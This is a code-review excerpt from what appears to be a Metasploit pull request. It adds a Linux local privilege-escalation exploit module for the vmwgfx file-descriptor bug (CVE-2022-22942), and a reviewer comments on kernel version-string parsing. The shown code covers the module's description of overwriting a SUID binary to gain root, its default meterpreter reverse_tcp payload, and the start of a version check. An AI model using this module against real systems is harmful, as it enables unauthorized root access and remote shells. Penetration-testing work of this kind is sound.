modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb

```diff
@@ -0,0 +1,178 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Post::Linux::Compile
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'vmwgfx Driver File Descriptor Handling Priv Esc',
+        'Description' => %q{
+          If the vmwgfx driver fails to copy the 'fence_rep' object to userland, it tries to
+          recover by deallocating the (already populated) file descriptor. This is
+          wrong, as the fd gets released via put_unused_fd() which shouldn't be used,
+          as the fd table slot was already populated via the previous call to
+          fd_install(). This leaves userland with a valid fd table entry pointing to
+          a free'd 'file' object.
+
+          We use this bug to overwrite a SUID binary with our payload and gain root.
+          Linux kernel 4.14-rc1 - 5.17-rc1 are vulnerable.
+
+          Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Mathias Krause' # original PoC, analysis
+        ],
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [
+          [ 'URL', 'https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse' ],
+          [ 'URL', 'https://github.com/opensrcsec/same_type_object_reuse_exploits' ],
+          [ 'CVE', '2022-22942' ]
+        ],
+        'DisclosureDate' => '2022-01-28',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+          'PrependFork' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_OS_DOWN],
+          'Reliability' => [REPEATABLE_SESSION],
+          # seeing "BUG: Bad page cache in process <process> pfn:<5 characters>" on console
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def check
+    # Check the kernel version to see if its in a vulnerable range
+    release = kernel_release
+    unless Rex::Version.new(release) > Rex::Version.new('4.14-rc1') &&
+           Rex::Version.new(release) < Rex::Version.new('5.17-rc1')
```

Comment:
Note to reviewer, we should verify Rex::Version handles the `rc1` convention as expected - we've seen otehr modules break with other strings in them such as `a`/`b`/etc as identifiers